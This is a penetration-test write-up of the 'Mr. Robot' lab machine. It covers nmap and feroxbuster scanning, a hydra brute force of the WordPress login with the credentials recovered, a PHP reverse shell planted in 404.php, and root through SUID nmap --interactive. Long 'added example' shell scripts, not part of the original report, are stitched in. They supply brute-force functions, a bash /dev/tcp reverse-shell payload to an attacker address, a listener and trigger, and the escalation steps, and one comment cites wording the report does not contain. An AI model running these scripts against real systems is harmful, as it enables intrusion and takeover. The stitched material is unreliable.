Penetration Test Report
(Mr. Robot Machine)
Cyber Security
Apoorav Verma
INDEX
1. Executive Summary
1.1 Scope of Work
1.2 Summary of Results
1.3 Assumptions
2. Attack Flow
2.1 Gathering Information
2.2 Vulnerability Check and Initial Access
2.3 Reverse Shell and Initial Server Connection
2.4 Root Access via Nmap Interactive Mode
3. Conclusion
1. Executive Summary
This report is the result of a penetration test performed in a controlled environment. All activities
were conducted under written permission and followed the methods an attacker would typically use.
Through this test, the customer receives the following results:
• Identifying whether the target system is vulnerable
• Identifying whether the target system can be compromised by exploiting the vulnerabilities found
I conducted the penetration test against the vulnerabilities of the existing services and obtained
privileged access through a poor administration practice: the nmap binary had the SUID bit set
(mode 4000), which means it runs with root privilege regardless of which user executes it. We
could get root access by executing nmap --interactive. Through this test, software vulnerabilities
gave us the key to open the door, and insecure practices gave us full access to the server.
1.1. Scope of Work
The test was designed to carry out the following steps within a virtual environment:
• Scanning the target network to find a victim (server)
• Gathering detailed information about the victim (server)
• Exploiting vulnerabilities in the running services
• Using hydra to obtain a login ID and password
• Logging into WordPress to modify 404.php
• Gaining access to the victim by appending php-reverse-shell.php to the end of 404.php, then
catching the connection with the nc command
• Using find / -perm -4000 to check possible attack options (SUID binaries)
• Executing nmap --interactive to obtain root privilege through nmap's interactive mode
1.2. Summary of Results
The test used the WordPress login page to enumerate user IDs and obtained the password with the
hydra command. With a valid ID and password, we logged in to the server to go further. By
modifying 404.php, we could connect to the target using the nc command. Finally, we obtained
root privilege by executing nmap --interactive.
1.3. Assumptions
Firstly, written permission for the penetration test has been issued and approved. Secondly, the
target server is not in production and is a duplicate copy running in a virtual environment.
Thirdly, the server runs vulnerable services. Fourthly, the tester uses Kali Linux on the same
virtual network. Lastly, this report is only valid under these controlled test conditions; if
anything changes, the results may differ.
2. Attack Flow
2.1. Gathering information
Gathering information is the first step of our penetration test, so we use the nmap command to scan
the target network and locate the target system at 10.10.39.138, where three services were found:
ssh, http, and https. Details of each service can be obtained by specifying a port range with
"-p<start port>-<end port>" or a single port with "-p<port>". For example, all ports on the server
10.10.39.138 can be scanned with
nmap -sV -O -p1-65535 10.10.39.138
where -sV probes service versions, -O attempts OS detection, 1 is the first port number and 65535 is
the last. For your information, we did not need to scan all ports, as we already knew that only
three services were running on the server.
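The scan above, followed by a small parser for nmap's grepable (-oG) output, as an added example that is not part of the original report. The target address is the one the report gives; the scan output embedded in the script is constructed to match the three services the report names, so the parser runs offline.

```shell
#!/bin/sh
# Added example (not from the original report): the scan from section 2.1 and
# a parser for nmap's grepable (-oG) output. The target 10.10.39.138 is the
# address the report gives; the scan output embedded below is CONSTRUCTED to
# match the three services the report names, so the parser runs offline.

TARGET=10.10.39.138

# Full-port service and OS scan as the report describes (-sV service
# versions, -O OS detection, -p1-65535 every TCP port). -oG also saves
# grepable output that parse_open_ports reads. Needs root for -O and a
# reachable target, so it is defined here but not run.
scan_target() {
    nmap -sV -O -p1-65535 -oG "$1.gnmap" "$1"
}

# parse_open_ports FILE -> one line "port/proto service" per open port.
# Grepable lines are tab-separated; the Ports field holds comma-separated
# entries of the form port/state/proto/owner/service/rpcinfo/version/.
parse_open_ports() {
    awk -F'\t' '/^Host:/ {
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^Ports: /) {
                sub(/^Ports: /, "", $i)
                n = split($i, entry, /, /)
                for (j = 1; j <= n; j++) {
                    split(entry[j], f, "/")
                    if (f[2] == "open") print f[1] "/" f[3] " " f[5]
                }
            }
        }
    }' "$1"
}

# Constructed sample of -oG output (not a real capture from the target).
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
{
    printf '# Nmap scan (constructed sample)\n'
    printf 'Host: %s ()\tStatus: Up\n' "$TARGET"
    printf 'Host: %s ()\tPorts: 22/open/tcp//ssh//OpenSSH/, 80/open/tcp//http//Apache httpd/, 443/open/tcp//ssl|http//Apache httpd/, 8080/closed/tcp//http-proxy///\tIgnored State: filtered (65531)\n' "$TARGET"
} > "$SAMPLE"

# open_ports -> the open ports parsed from the sample (returns the list).
open_ports() {
    parse_open_ports "$SAMPLE"
}

open_ports
```

Against a live target, run scan_target "$TARGET" and point parse_open_ports at the resulting 10.10.39.138.gnmap file; closed and filtered entries are dropped, so what remains is exactly the service list to carry into the next phase.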
2.2. Vulnerability check and initial access to the target server
First of all, the detailed scan shows an http service, so we can run feroxbuster -u
http://10.10.39.138 to enumerate the web content. The following pictures show the result of
executing feroxbuster:
Checking the web site from feroxbuster's results, we could download the fsocity.dic file from the
victim server, which gave us a wordlist for guessing an ID and its password; here we also found
the first of the three keys.
Next, we used the hydra command against the WordPress login to find the ID and its password, and
obtained the ID elliot with the password ER28-0652. The following pictures show the result of
obtaining the ID and the password.
NOTE: My machine broke while doing the hydra scan, so I restarted the machine and my IP changed.
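The wordlist preparation and the two hydra runs behind this section, as an added example that is not code from the original report. The target address, the user name elliot and wp-login.php come from the report. The hydra http-post-form syntax is standard; the WordPress failure strings "Invalid username" and "is incorrect" are assumed for the WordPress version on this machine and should be confirmed with one manual failed login, since newer WordPress releases word those errors differently. The wordlist in the script is constructed so that the offline part runs without the real fsocity.dic.

```shell
#!/bin/sh
# Added example (not from the original report): wordlist preparation and the
# hydra runs behind section 2.2. Target address, user name and wp-login.php
# come from the report. The hydra form syntax is standard; the failure
# strings are ASSUMED for the WordPress version on this machine, so confirm
# them with one manual failed login first. The wordlist below is CONSTRUCTED
# so the offline part runs without the real fsocity.dic.

TARGET=10.10.39.138
LOGIN_FORM="/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In"

# Wordlists pulled off a target are often full of repeated lines; sorting
# them unique before hydra removes every redundant login attempt.
# dedupe_wordlist IN OUT -> prints the number of unique entries written.
dedupe_wordlist() {
    sort -u "$1" > "$2"
    wc -l < "$2" | tr -d ' '
}

# Step 1, user enumeration: WordPress answers "Invalid username" for an
# unknown account, so hydra (F= failure string) reports any other reply as
# a valid user. Every wordlist entry is tried as a user name with a
# throwaway password.
enumerate_users() {
    hydra -L "$1" -p x "$TARGET" http-post-form "$LOGIN_FORM:F=Invalid username"
}

# Step 2, password guessing for one known user (the report found elliot):
# a wrong password yields "...is incorrect"; anything else is the hit.
crack_password() {
    hydra -l "$1" -P "$2" "$TARGET" http-post-form "$LOGIN_FORM:F=is incorrect"
}

# Offline part: a constructed wordlist with duplicates (not fsocity.dic).
RAW=$(mktemp)
CLEAN=$(mktemp)
trap 'rm -f "$RAW" "$CLEAN"' EXIT
printf '%s\n' true false elliot wpadmin elliot true elliot robot > "$RAW"
UNIQUE=$(dedupe_wordlist "$RAW" "$CLEAN")
echo "wordlist: 8 raw lines -> $UNIQUE unique entries"

# Live part, needs hydra and a reachable target (not run here):
#   enumerate_users "$CLEAN"
#   crack_password elliot "$CLEAN"
```

Deduplicating first matters more than it looks: hydra's runtime is proportional to the number of attempts, and a wordlist harvested from a target can repeat the same entries many times over.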
2.3. Initial access to the server with a reverse shell
First of all, with the credentials from the hydra result, we could log in to the target through the
WordPress login page http://10.10.113.8/wp-login.php with the ID elliot and the password
ER28-0652. Next, from the WordPress admin page we opened the theme editor and appended the
reverse-shell code (php-reverse-shell.php, configured with our listener's address and port) to
the end of the 404.php file. The following picture shows the appended result.
Finally, we started a listener on our machine with
# nc -lvnp 4321
and requested the 404 page on the target, which executed the appended code and connected back
to the listener.
2.4. Access root account
From the reverse shell, find / -perm -4000 listed the SUID binaries on the server and showed
that nmap runs with root privilege. Finally, we could obtain root privilege by running
nmap --interactive, whose interactive prompt executes shell commands as root.
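The reverse-shell step from section 2.3 and the SUID audit and nmap escalation from section 2.4, as one added example that is not code from the original report. The target 10.10.113.8 and port 4321 are from the report; the attacker address 10.10.0.2 is an assumption (the report never states it), and the short bash-based PHP payload is an assumed stand-in for the pentestmonkey php-reverse-shell.php the report used. The SUID check is run here against a constructed temporary directory so that part executes offline.

```shell
#!/bin/sh
# Added example (not from the original report) covering sections 2.3 and 2.4:
# the reverse-shell payload appended to the theme's 404.php, the listener
# and trigger, the SUID audit, and the nmap --interactive step. Target
# 10.10.113.8 and port 4321 are from the report; the attacker address is an
# ASSUMPTION (the report never states it), as is the bash-based payload,
# which stands in for the pentestmonkey php-reverse-shell.php the report
# used. The SUID check runs here against a constructed temporary directory
# so it executes offline.

ATTACKER=10.10.0.2      # assumed attacker (Kali) address
PORT=4321
TARGET=10.10.113.8

# reverse_shell_php ATTACKER PORT -> the PHP line to paste at the end of
# 404.php in the WordPress theme editor. It needs bash on the target.
reverse_shell_php() {
    cat <<EOF
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/$1/$2 0>&1'"); ?>
EOF
}

# Run in one attacker terminal (this is the report's nc -lvnp 4321).
start_listener() {
    nc -lvnp "$PORT"
}

# Run in a second terminal. WordPress renders the active theme's 404.php
# for any missing page, so one request to a nonexistent URL fires the
# payload without needing to know the theme directory.
trigger_404() {
    curl -s -o /dev/null "http://$TARGET/this-page-does-not-exist"
}

# Inside the caught shell: find SUID binaries (mode bit 4000, what the
# report calls "permission 400"). Anything outside the stock set, such as
# nmap, is a privilege-escalation candidate. suid_audit DIR lists them.
suid_audit() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# is_suid FILE -> true when the setuid bit is set on FILE.
is_suid() {
    [ -u "$1" ]
}

# Privilege escalation (run on the target, not reproduced offline): old
# nmap releases (up to 5.21) ship an --interactive mode in which a leading
# "!" runs a shell command; with nmap SUID root that command runs with
# root's effective uid.
#   $ nmap --interactive
#   nmap> !sh
#   # whoami
#   root

# Offline demonstration on a constructed directory (not the target's files).
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT
printf '#!/bin/sh\necho fake\n' > "$DEMO/fake-nmap"
printf '' > "$DEMO/plain"
chmod 4755 "$DEMO/fake-nmap"
chmod 755 "$DEMO/plain"
echo "SUID files under $DEMO:"
suid_audit "$DEMO"
reverse_shell_php "$ATTACKER" "$PORT"
```

On the real target the audit is suid_audit / and the interesting line is the nmap binary; the same find command is also the check a defender runs to catch such a misconfiguration before an attacker does.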
3. Conclusion
All activities were conducted under written permission and followed the methods an attacker
would typically use. All activities were conducted to simulate unauthorized access from outside.
Through this test, I give the customer the following results:
• The target system is vulnerable
• The target system was compromised by exploiting the vulnerabilities found
I conducted the penetration test based on the weakness of the WordPress login and on executables
that run with root privilege (SUID) during their execution. The test result shows that these poor
practices let the attacker into the server.